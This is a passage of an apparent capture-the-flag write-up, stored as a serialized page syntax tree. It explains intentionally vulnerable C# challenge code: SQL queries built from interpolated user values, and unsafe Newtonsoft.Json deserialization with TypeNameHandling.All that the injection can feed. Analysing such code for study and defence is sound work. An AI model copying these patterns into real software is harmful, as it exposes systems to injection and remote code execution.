_db",{"type":32,"tag":89,"props":1238,"children":1239},{"style":124},[1240],{"type":37,"value":167},{"type":32,"tag":89,"props":1242,"children":1243},{"style":159},[1244],{"type":37,"value":1245},"Database",{"type":32,"tag":89,"props":1247,"children":1248},{"style":124},[1249],{"type":37,"value":167},{"type":32,"tag":89,"props":1251,"children":1252},{"style":118},[1253],{"type":37,"value":1254},"ExecuteSqlRaw",{"type":32,"tag":89,"props":1256,"children":1257},{"style":124},[1258],{"type":37,"value":357},{"type":32,"tag":89,"props":1260,"children":1261},{"style":159},[1262],{"type":37,"value":1263},"sqlQueryAddWishlist",{"type":32,"tag":89,"props":1265,"children":1266},{"style":124},[1267],{"type":37,"value":907},{"type":32,"tag":89,"props":1269,"children":1271},{"class":91,"line":1270},34,[1272],{"type":32,"tag":89,"props":1273,"children":1274},{"style":124},[1275],{"type":37,"value":1276},"        }\n",{"type":32,"tag":89,"props":1278,"children":1280},{"class":91,"line":1279},35,[1281],{"type":32,"tag":89,"props":1282,"children":1283},{"style":143},[1284],{"type":37,"value":1285},"        
else\n",{"type":32,"tag":89,"props":1287,"children":1289},{"class":91,"line":1288},36,[1290],{"type":32,"tag":89,"props":1291,"children":1292},{"style":124},[1293],{"type":37,"value":839},{"type":32,"tag":89,"props":1295,"children":1297},{"class":91,"line":1296},37,[1298,1302,1307,1311,1315,1319,1323,1327,1331,1336,1340,1344,1348],{"type":32,"tag":89,"props":1299,"children":1300},{"style":143},[1301],{"type":37,"value":1124},{"type":32,"tag":89,"props":1303,"children":1304},{"style":118},[1305],{"type":37,"value":1306}," username",{"type":32,"tag":89,"props":1308,"children":1309},{"style":124},[1310],{"type":37,"value":156},{"type":32,"tag":89,"props":1312,"children":1313},{"style":159},[1314],{"type":37,"value":162},{"type":32,"tag":89,"props":1316,"children":1317},{"style":124},[1318],{"type":37,"value":167},{"type":32,"tag":89,"props":1320,"children":1321},{"style":159},[1322],{"type":37,"value":172},{"type":32,"tag":89,"props":1324,"children":1325},{"style":124},[1326],{"type":37,"value":177},{"type":32,"tag":89,"props":1328,"children":1329},{"style":180},[1330],{"type":37,"value":183},{"type":32,"tag":89,"props":1332,"children":1333},{"style":186},[1334],{"type":37,"value":1335},"username",{"type":32,"tag":89,"props":1337,"children":1338},{"style":180},[1339],{"type":37,"value":183},{"type":32,"tag":89,"props":1341,"children":1342},{"style":124},[1343],{"type":37,"value":198},{"type":32,"tag":89,"props":1345,"children":1346},{"style":118},[1347],{"type":37,"value":203},{"type":32,"tag":89,"props":1349,"children":1350},{"style":124},[1351],{"type":37,"value":208},{"type":32,"tag":89,"props":1353,"children":1355},{"class":91,"line":1354},38,[1356,1360,1364,1368,1372,1377,1381,1386,1391,1395,1399],{"type":32,"tag":89,"props":1357,"children":1358},{"style":112},[1359],{"type":37,"value":848},{"type":32,"tag":89,"props":1361,"children":1362},{"style":124},[1363],{"type":37,"value":853},{"type":32,"tag":89,"props":1365,"children":1366},{"style":112},[1367],{"type":37
,"value":858},{"type":32,"tag":89,"props":1369,"children":1370},{"style":124},[1371],{"type":37,"value":863},{"type":32,"tag":89,"props":1373,"children":1374},{"style":118},[1375],{"type":37,"value":1376}," wishListProducts",{"type":32,"tag":89,"props":1378,"children":1379},{"style":124},[1380],{"type":37,"value":156},{"type":32,"tag":89,"props":1382,"children":1383},{"style":106},[1384],{"type":37,"value":1385}," new",{"type":32,"tag":89,"props":1387,"children":1388},{"style":112},[1389],{"type":37,"value":1390}," List",{"type":32,"tag":89,"props":1392,"children":1393},{"style":124},[1394],{"type":37,"value":853},{"type":32,"tag":89,"props":1396,"children":1397},{"style":112},[1398],{"type":37,"value":858},{"type":32,"tag":89,"props":1400,"children":1401},{"style":124},[1402],{"type":37,"value":1403},">();\n",{"type":32,"tag":89,"props":1405,"children":1407},{"class":91,"line":1406},39,[1408,1413,1417,1421,1425,1429],{"type":32,"tag":89,"props":1409,"children":1410},{"style":159},[1411],{"type":37,"value":1412},"            
wishListProducts",{"type":32,"tag":89,"props":1414,"children":1415},{"style":124},[1416],{"type":37,"value":167},{"type":32,"tag":89,"props":1418,"children":1419},{"style":118},[1420],{"type":37,"value":1103},{"type":32,"tag":89,"props":1422,"children":1423},{"style":124},[1424],{"type":37,"value":357},{"type":32,"tag":89,"props":1426,"children":1427},{"style":159},[1428],{"type":37,"value":736},{"type":32,"tag":89,"props":1430,"children":1431},{"style":124},[1432],{"type":37,"value":907},{"type":32,"tag":89,"props":1434,"children":1436},{"class":91,"line":1435},40,[1437,1441,1445,1449,1453,1457,1461,1465,1470],{"type":32,"tag":89,"props":1438,"children":1439},{"style":143},[1440],{"type":37,"value":1124},{"type":32,"tag":89,"props":1442,"children":1443},{"style":118},[1444],{"type":37,"value":1129},{"type":32,"tag":89,"props":1446,"children":1447},{"style":124},[1448],{"type":37,"value":156},{"type":32,"tag":89,"props":1450,"children":1451},{"style":159},[1452],{"type":37,"value":877},{"type":32,"tag":89,"props":1454,"children":1455},{"style":124},[1456],{"type":37,"value":167},{"type":32,"tag":89,"props":1458,"children":1459},{"style":118},[1460],{"type":37,"value":1146},{"type":32,"tag":89,"props":1462,"children":1463},{"style":124},[1464],{"type":37,"value":357},{"type":32,"tag":89,"props":1466,"children":1467},{"style":159},[1468],{"type":37,"value":1469},"wishListProducts",{"type":32,"tag":89,"props":1471,"children":1472},{"style":124},[1473],{"type":37,"value":907},{"type":32,"tag":89,"props":1475,"children":1477},{"class":91,"line":1476},41,[1478,1482,1486,1490,1494,1499,1503,1507,1511,1516,1520,1524,1528,1533,1537,1541,1545,1550,1554,1558],{"type":32,"tag":89,"props":1479,"children":1480},{"style":143},[1481],{"type":37,"value":1124},{"type":32,"tag":89,"props":1483,"children":1484},{"style":118},[1485],{"type":37,"value":1172},{"type":32,"tag":89,"props":1487,"children":1488},{"style":124},[1489],{"type":37,"value":156},{"type":32,"tag":89,"props":1491,"ch
ildren":1492},{"style":180},[1493],{"type":37,"value":230},{"type":32,"tag":89,"props":1495,"children":1496},{"style":186},[1497],{"type":37,"value":1498},"INSERT INTO Wishlist(ID, username, data) VALUES(",{"type":32,"tag":89,"props":1500,"children":1501},{"style":124},[1502],{"type":37,"value":240},{"type":32,"tag":89,"props":1504,"children":1505},{"style":186},[1506],{"type":37,"value":189},{"type":32,"tag":89,"props":1508,"children":1509},{"style":124},[1510],{"type":37,"value":249},{"type":32,"tag":89,"props":1512,"children":1513},{"style":186},[1514],{"type":37,"value":1515},",'",{"type":32,"tag":89,"props":1517,"children":1518},{"style":124},[1519],{"type":37,"value":240},{"type":32,"tag":89,"props":1521,"children":1522},{"style":186},[1523],{"type":37,"value":1335},{"type":32,"tag":89,"props":1525,"children":1526},{"style":124},[1527],{"type":37,"value":249},{"type":32,"tag":89,"props":1529,"children":1530},{"style":186},[1531],{"type":37,"value":1532},"', '",{"type":32,"tag":89,"props":1534,"children":1535},{"style":124},[1536],{"type":37,"value":240},{"type":32,"tag":89,"props":1538,"children":1539},{"style":186},[1540],{"type":37,"value":1194},{"type":32,"tag":89,"props":1542,"children":1543},{"style":124},[1544],{"type":37,"value":249},{"type":32,"tag":89,"props":1546,"children":1547},{"style":186},[1548],{"type":37,"value":1549},"')",{"type":32,"tag":89,"props":1551,"children":1552},{"style":180},[1553],{"type":37,"value":183},{"type":32,"tag":89,"props":1555,"children":1556},{"style":124},[1557],{"type":37,"value":263},{"type":32,"tag":89,"props":1559,"children":1560},{"style":96},[1561],{"type":37,"value":268},{"type":32,"tag":89,"props":1563,"children":1565},{"class":91,"line":1564},42,[1566,1570,1574,1578,1582,1586,1590,1594],{"type":32,"tag":89,"props":1567,"children":1568},{"style":159},[1569],{"type":37,"value":1236},{"type":32,"tag":89,"props":1571,"children":1572},{"style":124},[1573],{"type":37,"value":167},{"type":32,"tag":89,"props":1575,"chi
ldren":1576},{"style":159},[1577],{"type":37,"value":1245},{"type":32,"tag":89,"props":1579,"children":1580},{"style":124},[1581],{"type":37,"value":167},{"type":32,"tag":89,"props":1583,"children":1584},{"style":118},[1585],{"type":37,"value":1254},{"type":32,"tag":89,"props":1587,"children":1588},{"style":124},[1589],{"type":37,"value":357},{"type":32,"tag":89,"props":1591,"children":1592},{"style":159},[1593],{"type":37,"value":1263},{"type":32,"tag":89,"props":1595,"children":1596},{"style":124},[1597],{"type":37,"value":907},{"type":32,"tag":89,"props":1599,"children":1601},{"class":91,"line":1600},43,[1602],{"type":32,"tag":89,"props":1603,"children":1604},{"style":124},[1605],{"type":37,"value":1276},{"type":32,"tag":89,"props":1607,"children":1609},{"class":91,"line":1608},44,[1610,1615,1619,1623,1627,1632,1636],{"type":32,"tag":89,"props":1611,"children":1612},{"style":143},[1613],{"type":37,"value":1614},"        return",{"type":32,"tag":89,"props":1616,"children":1617},{"style":118},[1618],{"type":37,"value":1047},{"type":32,"tag":89,"props":1620,"children":1621},{"style":124},[1622],{"type":37,"value":357},{"type":32,"tag":89,"props":1624,"children":1625},{"style":180},[1626],{"type":37,"value":183},{"type":32,"tag":89,"props":1628,"children":1629},{"style":186},[1630],{"type":37,"value":1631},"Added",{"type":32,"tag":89,"props":1633,"children":1634},{"style":180},[1635],{"type":37,"value":183},{"type":32,"tag":89,"props":1637,"children":1638},{"style":124},[1639],{"type":37,"value":907},{"type":32,"tag":89,"props":1641,"children":1643},{"class":91,"line":1642},45,[1644],{"type":32,"tag":89,"props":1645,"children":1646},{"style":124},[1647],{"type":37,"value":1648},"    }\n",{"type":32,"tag":89,"props":1650,"children":1652},{"class":91,"line":1651},46,[1653,1658,1662,1666,1670,1675,1679],{"type":32,"tag":89,"props":1654,"children":1655},{"style":143},[1656],{"type":37,"value":1657},"    
return",{"type":32,"tag":89,"props":1659,"children":1660},{"style":118},[1661],{"type":37,"value":1047},{"type":32,"tag":89,"props":1663,"children":1664},{"style":124},[1665],{"type":37,"value":357},{"type":32,"tag":89,"props":1667,"children":1668},{"style":180},[1669],{"type":37,"value":183},{"type":32,"tag":89,"props":1671,"children":1672},{"style":186},[1673],{"type":37,"value":1674},"Invalid",{"type":32,"tag":89,"props":1676,"children":1677},{"style":180},[1678],{"type":37,"value":183},{"type":32,"tag":89,"props":1680,"children":1681},{"style":124},[1682],{"type":37,"value":907},{"type":32,"tag":89,"props":1684,"children":1686},{"class":91,"line":1685},47,[1687],{"type":32,"tag":89,"props":1688,"children":1689},{"style":124},[1690],{"type":37,"value":311},{"type":32,"tag":46,"props":1692,"children":1693},{},[1694],{"type":37,"value":1695},"We can also see that SQL injection is present in SELECT, INSERT, and UPDATE queries. However, the flag is not stored in the database, so the SQL injection alone is not enough: we need to use it to reach another vulnerability. That is what the next section covers.",{"type":32,"tag":39,"props":1697,"children":1699},{"id":1698},"deserialization",[1700],{"type":37,"value":1701},"Deserialization",{"type":32,"tag":46,"props":1703,"children":1704},{},[1705],{"type":37,"value":1706},"Our first impression when discovering these SQLi was to exploit arbitrary file reading or remote code execution directly from an SQLi. 
However, since no SQLite module was loaded, we were unable to exploit this way.",{"type":32,"tag":46,"props":1708,"children":1709},{},[1710],{"type":37,"value":1711},"While reading through the code, we notice something peculiar: the wishlist is serialized before it is stored, and it is deserialized directly from the result of an SQL query, so the deserializer's input is whatever that column contains.",{"type":32,"tag":74,"props":1713,"children":1714},{"lang":76},[1715],{"type":32,"tag":79,"props":1716,"children":1718},{"code":1717,"language":76,"meta":7,"className":82,"style":7},"[HttpGet]\npublic IActionResult Wishlist()\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\";\n    var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n\n    if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n    {\n        // Here we can see an deserialization directly from the database result\n        List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n        return View(products);\n\n    }\n    
[...]\n}\n",[1719],{"type":32,"tag":85,"props":1720,"children":1721},{"__ignoreMap":7},[1722,1738,1757,1764,1819,1867,1922,1929,1992,1999,2007,2067,2091,2098,2105,2124],{"type":32,"tag":89,"props":1723,"children":1724},{"class":91,"line":92},[1725,1729,1734],{"type":32,"tag":89,"props":1726,"children":1727},{"style":124},[1728],{"type":37,"value":177},{"type":32,"tag":89,"props":1730,"children":1731},{"style":112},[1732],{"type":37,"value":1733},"HttpGet",{"type":32,"tag":89,"props":1735,"children":1736},{"style":124},[1737],{"type":37,"value":302},{"type":32,"tag":89,"props":1739,"children":1740},{"class":91,"line":102},[1741,1745,1749,1753],{"type":32,"tag":89,"props":1742,"children":1743},{"style":106},[1744],{"type":37,"value":109},{"type":32,"tag":89,"props":1746,"children":1747},{"style":112},[1748],{"type":37,"value":115},{"type":32,"tag":89,"props":1750,"children":1751},{"style":118},[1752],{"type":37,"value":121},{"type":32,"tag":89,"props":1754,"children":1755},{"style":124},[1756],{"type":37,"value":127},{"type":32,"tag":89,"props":1758,"children":1759},{"class":91,"line":130},[1760],{"type":32,"tag":89,"props":1761,"children":1762},{"style":124},[1763],{"type":37,"value":136},{"type":32,"tag":89,"props":1765,"children":1766},{"class":91,"line":139},[1767,1771,1775,1779,1783,1787,1791,1795,1799,1803,1807,1811,1815],{"type":32,"tag":89,"props":1768,"children":1769},{"style":143},[1770],{"type":37,"value":146},{"type":32,"tag":89,"props":1772,"children":1773},{"style":118},[1774],{"type":37,"value":151},{"type":32,"tag":89,"props":1776,"children":1777},{"style":124},[1778],{"type":37,"value":156},{"type":32,"tag":89,"props":1780,"children":1781},{"style":159},[1782],{"type":37,"value":162},{"type":32,"tag":89,"props":1784,"children":1785},{"style":124},[1786],{"type":37,"value":167},{"type":32,"tag":89,"props":1788,"children":1789},{"style":159},[1790],{"type":37,"value":172},{"type":32,"tag":89,"props":1792,"children":1793},{"style":124},[1794],{"type":37,
"value":177},{"type":32,"tag":89,"props":1796,"children":1797},{"style":180},[1798],{"type":37,"value":183},{"type":32,"tag":89,"props":1800,"children":1801},{"style":186},[1802],{"type":37,"value":189},{"type":32,"tag":89,"props":1804,"children":1805},{"style":180},[1806],{"type":37,"value":183},{"type":32,"tag":89,"props":1808,"children":1809},{"style":124},[1810],{"type":37,"value":198},{"type":32,"tag":89,"props":1812,"children":1813},{"style":118},[1814],{"type":37,"value":203},{"type":32,"tag":89,"props":1816,"children":1817},{"style":124},[1818],{"type":37,"value":208},{"type":32,"tag":89,"props":1820,"children":1821},{"class":91,"line":211},[1822,1826,1830,1834,1838,1842,1846,1850,1854,1858,1862],{"type":32,"tag":89,"props":1823,"children":1824},{"style":143},[1825],{"type":37,"value":146},{"type":32,"tag":89,"props":1827,"children":1828},{"style":118},[1829],{"type":37,"value":221},{"type":32,"tag":89,"props":1831,"children":1832},{"style":124},[1833],{"type":37,"value":156},{"type":32,"tag":89,"props":1835,"children":1836},{"style":180},[1837],{"type":37,"value":230},{"type":32,"tag":89,"props":1839,"children":1840},{"style":186},[1841],{"type":37,"value":235},{"type":32,"tag":89,"props":1843,"children":1844},{"style":124},[1845],{"type":37,"value":240},{"type":32,"tag":89,"props":1847,"children":1848},{"style":186},[1849],{"type":37,"value":189},{"type":32,"tag":89,"props":1851,"children":1852},{"style":124},[1853],{"type":37,"value":249},{"type":32,"tag":89,"props":1855,"children":1856},{"style":186},[1857],{"type":37,"value":254},{"type":32,"tag":89,"props":1859,"children":1860},{"style":180},[1861],{"type":37,"value":183},{"type":32,"tag":89,"props":1863,"children":1864},{"style":124},[1865],{"type":37,"value":1866},";\n",{"type":32,"tag":89,"props":1868,"children":1869},{"class":91,"line":271},[1870,1874,1878,1882,1886,1890,1894,1898,1902,1906,1910,1914,1918],{"type":32,"tag":89,"props":1871,"children":1872},{"style":106},[1873],{"type":37,"value":509
},{"type":32,"tag":89,"props":1875,"children":1876},{"style":118},[1877],{"type":37,"value":514},{"type":32,"tag":89,"props":1879,"children":1880},{"style":124},[1881],{"type":37,"value":156},{"type":32,"tag":89,"props":1883,"children":1884},{"style":159},[1885],{"type":37,"value":523},{"type":32,"tag":89,"props":1887,"children":1888},{"style":124},[1889],{"type":37,"value":167},{"type":32,"tag":89,"props":1891,"children":1892},{"style":159},[1893],{"type":37,"value":532},{"type":32,"tag":89,"props":1895,"children":1896},{"style":124},[1897],{"type":37,"value":167},{"type":32,"tag":89,"props":1899,"children":1900},{"style":118},[1901],{"type":37,"value":541},{"type":32,"tag":89,"props":1903,"children":1904},{"style":124},[1905],{"type":37,"value":357},{"type":32,"tag":89,"props":1907,"children":1908},{"style":159},[1909],{"type":37,"value":550},{"type":32,"tag":89,"props":1911,"children":1912},{"style":124},[1913],{"type":37,"value":555},{"type":32,"tag":89,"props":1915,"children":1916},{"style":118},[1917],{"type":37,"value":560},{"type":32,"tag":89,"props":1919,"children":1920},{"style":124},[1921],{"type":37,"value":208},{"type":32,"tag":89,"props":1923,"children":1924},{"class":91,"line":281},[1925],{"type":32,"tag":89,"props":1926,"children":1927},{"emptyLinePlaceholder":275},[1928],{"type":37,"value":278},{"type":32,"tag":89,"props":1930,"children":1931},{"class":91,"line":305},[1932,1936,1940,1944,1948,1952,1956,1960,1964,1968,1972,1976,1980,1984,1988],{"type":32,"tag":89,"props":1933,"children":1934},{"style":143},[1935],{"type":37,"value":705},{"type":32,"tag":89,"props":1937,"children":1938},{"style":124},[1939],{"type":37,"value":772},{"type":32,"tag":89,"props":1941,"children":1942},{"style":159},[1943],{"type":37,"value":777},{"type":32,"tag":89,"props":1945,"children":1946},{"style":106},[1947],{"type":37,"value":782},{"type":32,"tag":89,"props":1949,"children":1950},{"style":106},[1951],{"type":37,"value":787},{"type":32,"tag":89,"props":1953,"childre
n":1954},{"style":106},[1955],{"type":37,"value":792},{"type":32,"tag":89,"props":1957,"children":1958},{"style":106},[1959],{"type":37,"value":797},{"type":32,"tag":89,"props":1961,"children":1962},{"style":143},[1963],{"type":37,"value":362},{"type":32,"tag":89,"props":1965,"children":1966},{"style":124},[1967],{"type":37,"value":167},{"type":32,"tag":89,"props":1969,"children":1970},{"style":118},[1971],{"type":37,"value":727},{"type":32,"tag":89,"props":1973,"children":1974},{"style":124},[1975],{"type":37,"value":357},{"type":32,"tag":89,"props":1977,"children":1978},{"style":159},[1979],{"type":37,"value":777},{"type":32,"tag":89,"props":1981,"children":1982},{"style":124},[1983],{"type":37,"value":167},{"type":32,"tag":89,"props":1985,"children":1986},{"style":159},[1987],{"type":37,"value":826},{"type":32,"tag":89,"props":1989,"children":1990},{"style":124},[1991],{"type":37,"value":749},{"type":32,"tag":89,"props":1993,"children":1994},{"class":91,"line":314},[1995],{"type":32,"tag":89,"props":1996,"children":1997},{"style":124},[1998],{"type":37,"value":758},{"type":32,"tag":89,"props":2000,"children":2001},{"class":91,"line":331},[2002],{"type":32,"tag":89,"props":2003,"children":2004},{"style":96},[2005],{"type":37,"value":2006},"        // Here we can see an deserialization directly from the database result\n",{"type":32,"tag":89,"props":2008,"children":2009},{"class":91,"line":339},[2010,2015,2019,2023,2027,2031,2035,2039,2043,2047,2051,2055,2059,2063],{"type":32,"tag":89,"props":2011,"children":2012},{"style":112},[2013],{"type":37,"value":2014},"        
List",{"type":32,"tag":89,"props":2016,"children":2017},{"style":124},[2018],{"type":37,"value":853},{"type":32,"tag":89,"props":2020,"children":2021},{"style":112},[2022],{"type":37,"value":858},{"type":32,"tag":89,"props":2024,"children":2025},{"style":124},[2026],{"type":37,"value":863},{"type":32,"tag":89,"props":2028,"children":2029},{"style":118},[2030],{"type":37,"value":868},{"type":32,"tag":89,"props":2032,"children":2033},{"style":124},[2034],{"type":37,"value":156},{"type":32,"tag":89,"props":2036,"children":2037},{"style":159},[2038],{"type":37,"value":877},{"type":32,"tag":89,"props":2040,"children":2041},{"style":124},[2042],{"type":37,"value":167},{"type":32,"tag":89,"props":2044,"children":2045},{"style":118},[2046],{"type":37,"value":886},{"type":32,"tag":89,"props":2048,"children":2049},{"style":124},[2050],{"type":37,"value":357},{"type":32,"tag":89,"props":2052,"children":2053},{"style":159},[2054],{"type":37,"value":777},{"type":32,"tag":89,"props":2056,"children":2057},{"style":124},[2058],{"type":37,"value":167},{"type":32,"tag":89,"props":2060,"children":2061},{"style":159},[2062],{"type":37,"value":826},{"type":32,"tag":89,"props":2064,"children":2065},{"style":124},[2066],{"type":37,"value":907},{"type":32,"tag":89,"props":2068,"children":2069},{"class":91,"line":390},[2070,2074,2079,2083,2087],{"type":32,"tag":89,"props":2071,"children":2072},{"style":143},[2073],{"type":37,"value":1614},{"type":32,"tag":89,"props":2075,"children":2076},{"style":118},[2077],{"type":37,"value":2078}," 
View",{"type":32,"tag":89,"props":2080,"children":2081},{"style":124},[2082],{"type":37,"value":357},{"type":32,"tag":89,"props":2084,"children":2085},{"style":159},[2086],{"type":37,"value":1155},{"type":32,"tag":89,"props":2088,"children":2089},{"style":124},[2090],{"type":37,"value":907},{"type":32,"tag":89,"props":2092,"children":2093},{"class":91,"line":398},[2094],{"type":32,"tag":89,"props":2095,"children":2096},{"emptyLinePlaceholder":275},[2097],{"type":37,"value":278},{"type":32,"tag":89,"props":2099,"children":2100},{"class":91,"line":454},[2101],{"type":32,"tag":89,"props":2102,"children":2103},{"style":124},[2104],{"type":37,"value":1648},{"type":32,"tag":89,"props":2106,"children":2107},{"class":91,"line":503},[2108,2112,2116,2120],{"type":32,"tag":89,"props":2109,"children":2110},{"style":124},[2111],{"type":37,"value":287},{"type":32,"tag":89,"props":2113,"children":2114},{"style":106},[2115],{"type":37,"value":292},{"type":32,"tag":89,"props":2117,"children":2118},{"style":295},[2119],{"type":37,"value":167},{"type":32,"tag":89,"props":2121,"children":2122},{"style":124},[2123],{"type":37,"value":302},{"type":32,"tag":89,"props":2125,"children":2126},{"class":91,"line":567},[2127],{"type":32,"tag":89,"props":2128,"children":2129},{"style":124},[2130],{"type":37,"value":311},{"type":32,"tag":46,"props":2132,"children":2133},{},[2134],{"type":37,"value":2135},"And the SerializeHelper class is as follows:",{"type":32,"tag":74,"props":2137,"children":2138},{"lang":76},[2139],{"type":32,"tag":79,"props":2140,"children":2142},{"code":2141,"language":76,"meta":7,"className":82,"style":7},"using Newtonsoft.Json;\nusing Nexus_Void.Models;\n\nnamespace Nexus_Void.Helpers\n{\n    public class SerializeHelper\n    {\n        public static string Serialize(List\u003CProductModel> list)\n        {\n            string serializedResult = JsonConvert.SerializeObject(list, new JsonSerializerSettings\n            {\n                TypeNameHandling = 
TypeNameHandling.All\n            });\n\n            string encodedData = EncodeHelper.Encode(serializedResult);\n            return encodedData;\n        }\n\n        public static List\u003CProductModel> Deserialize(string str) \n        {\n            string decodedData = EncodeHelper.Decode(str);\n            \n            // unsafe deserialization\n            var deserialized = JsonConvert.DeserializeObject(decodedData, new JsonSerializerSettings\n            {\n                TypeNameHandling = TypeNameHandling.All\n            });\n\n            List\u003CProductModel> products = deserialized as List\u003CProductModel>;\n\n            return products;\n        }\n    }\n}\n",[2143],{"type":32,"tag":85,"props":2144,"children":2145},{"__ignoreMap":7},[2146,2172,2197,2204,2225,2232,2250,2257,2309,2316,2368,2375,2401,2409,2416,2459,2475,2482,2489,2544,2551,2593,2601,2609,2660,2667,2690,2697,2704,2757,2764,2779,2786,2793],{"type":32,"tag":89,"props":2147,"children":2148},{"class":91,"line":92},[2149,2154,2159,2163,2168],{"type":32,"tag":89,"props":2150,"children":2151},{"style":143},[2152],{"type":37,"value":2153},"using",{"type":32,"tag":89,"props":2155,"children":2156},{"style":112},[2157],{"type":37,"value":2158}," Newtonsoft",{"type":32,"tag":89,"props":2160,"children":2161},{"style":124},[2162],{"type":37,"value":167},{"type":32,"tag":89,"props":2164,"children":2165},{"style":112},[2166],{"type":37,"value":2167},"Json",{"type":32,"tag":89,"props":2169,"children":2170},{"style":124},[2171],{"type":37,"value":1866},{"type":32,"tag":89,"props":2173,"children":2174},{"class":91,"line":102},[2175,2179,2184,2188,2193],{"type":32,"tag":89,"props":2176,"children":2177},{"style":143},[2178],{"type":37,"value":2153},{"type":32,"tag":89,"props":2180,"children":2181},{"style":112},[2182],{"type":37,"value":2183}," 
Nexus_Void",{"type":32,"tag":89,"props":2185,"children":2186},{"style":124},[2187],{"type":37,"value":167},{"type":32,"tag":89,"props":2189,"children":2190},{"style":112},[2191],{"type":37,"value":2192},"Models",{"type":32,"tag":89,"props":2194,"children":2195},{"style":124},[2196],{"type":37,"value":1866},{"type":32,"tag":89,"props":2198,"children":2199},{"class":91,"line":130},[2200],{"type":32,"tag":89,"props":2201,"children":2202},{"emptyLinePlaceholder":275},[2203],{"type":37,"value":278},{"type":32,"tag":89,"props":2205,"children":2206},{"class":91,"line":139},[2207,2212,2216,2220],{"type":32,"tag":89,"props":2208,"children":2209},{"style":106},[2210],{"type":37,"value":2211},"namespace",{"type":32,"tag":89,"props":2213,"children":2214},{"style":112},[2215],{"type":37,"value":2183},{"type":32,"tag":89,"props":2217,"children":2218},{"style":124},[2219],{"type":37,"value":167},{"type":32,"tag":89,"props":2221,"children":2222},{"style":112},[2223],{"type":37,"value":2224},"Helpers\n",{"type":32,"tag":89,"props":2226,"children":2227},{"class":91,"line":211},[2228],{"type":32,"tag":89,"props":2229,"children":2230},{"style":124},[2231],{"type":37,"value":136},{"type":32,"tag":89,"props":2233,"children":2234},{"class":91,"line":271},[2235,2240,2245],{"type":32,"tag":89,"props":2236,"children":2237},{"style":106},[2238],{"type":37,"value":2239},"    public",{"type":32,"tag":89,"props":2241,"children":2242},{"style":106},[2243],{"type":37,"value":2244}," class",{"type":32,"tag":89,"props":2246,"children":2247},{"style":112},[2248],{"type":37,"value":2249}," 
SerializeHelper\n",{"type":32,"tag":89,"props":2251,"children":2252},{"class":91,"line":281},[2253],{"type":32,"tag":89,"props":2254,"children":2255},{"style":124},[2256],{"type":37,"value":758},{"type":32,"tag":89,"props":2258,"children":2259},{"class":91,"line":305},[2260,2265,2270,2274,2279,2283,2288,2292,2296,2300,2305],{"type":32,"tag":89,"props":2261,"children":2262},{"style":106},[2263],{"type":37,"value":2264},"        public",{"type":32,"tag":89,"props":2266,"children":2267},{"style":106},[2268],{"type":37,"value":2269}," static",{"type":32,"tag":89,"props":2271,"children":2272},{"style":143},[2273],{"type":37,"value":377},{"type":32,"tag":89,"props":2275,"children":2276},{"style":118},[2277],{"type":37,"value":2278}," Serialize",{"type":32,"tag":89,"props":2280,"children":2281},{"style":124},[2282],{"type":37,"value":357},{"type":32,"tag":89,"props":2284,"children":2285},{"style":112},[2286],{"type":37,"value":2287},"List",{"type":32,"tag":89,"props":2289,"children":2290},{"style":124},[2291],{"type":37,"value":853},{"type":32,"tag":89,"props":2293,"children":2294},{"style":112},[2295],{"type":37,"value":858},{"type":32,"tag":89,"props":2297,"children":2298},{"style":124},[2299],{"type":37,"value":863},{"type":32,"tag":89,"props":2301,"children":2302},{"style":118},[2303],{"type":37,"value":2304}," list",{"type":32,"tag":89,"props":2306,"children":2307},{"style":124},[2308],{"type":37,"value":387},{"type":32,"tag":89,"props":2310,"children":2311},{"class":91,"line":314},[2312],{"type":32,"tag":89,"props":2313,"children":2314},{"style":124},[2315],{"type":37,"value":839},{"type":32,"tag":89,"props":2317,"children":2318},{"class":91,"line":331},[2319,2323,2328,2332,2337,2341,2346,2350,2355,2359,2363],{"type":32,"tag":89,"props":2320,"children":2321},{"style":143},[2322],{"type":37,"value":1124},{"type":32,"tag":89,"props":2324,"children":2325},{"style":118},[2326],{"type":37,"value":2327}," 
serializedResult",{"type":32,"tag":89,"props":2329,"children":2330},{"style":124},[2331],{"type":37,"value":156},{"type":32,"tag":89,"props":2333,"children":2334},{"style":159},[2335],{"type":37,"value":2336}," JsonConvert",{"type":32,"tag":89,"props":2338,"children":2339},{"style":124},[2340],{"type":37,"value":167},{"type":32,"tag":89,"props":2342,"children":2343},{"style":118},[2344],{"type":37,"value":2345},"SerializeObject",{"type":32,"tag":89,"props":2347,"children":2348},{"style":124},[2349],{"type":37,"value":357},{"type":32,"tag":89,"props":2351,"children":2352},{"style":159},[2353],{"type":37,"value":2354},"list",{"type":32,"tag":89,"props":2356,"children":2357},{"style":124},[2358],{"type":37,"value":372},{"type":32,"tag":89,"props":2360,"children":2361},{"style":106},[2362],{"type":37,"value":1385},{"type":32,"tag":89,"props":2364,"children":2365},{"style":112},[2366],{"type":37,"value":2367}," JsonSerializerSettings\n",{"type":32,"tag":89,"props":2369,"children":2370},{"class":91,"line":339},[2371],{"type":32,"tag":89,"props":2372,"children":2373},{"style":124},[2374],{"type":37,"value":1033},{"type":32,"tag":89,"props":2376,"children":2377},{"class":91,"line":390},[2378,2383,2387,2392,2396],{"type":32,"tag":89,"props":2379,"children":2380},{"style":159},[2381],{"type":37,"value":2382},"                TypeNameHandling",{"type":32,"tag":89,"props":2384,"children":2385},{"style":124},[2386],{"type":37,"value":156},{"type":32,"tag":89,"props":2388,"children":2389},{"style":159},[2390],{"type":37,"value":2391}," TypeNameHandling",{"type":32,"tag":89,"props":2393,"children":2394},{"style":124},[2395],{"type":37,"value":167},{"type":32,"tag":89,"props":2397,"children":2398},{"style":159},[2399],{"type":37,"value":2400},"All\n",{"type":32,"tag":89,"props":2402,"children":2403},{"class":91,"line":398},[2404],{"type":32,"tag":89,"props":2405,"children":2406},{"style":124},[2407],{"type":37,"value":2408},"            
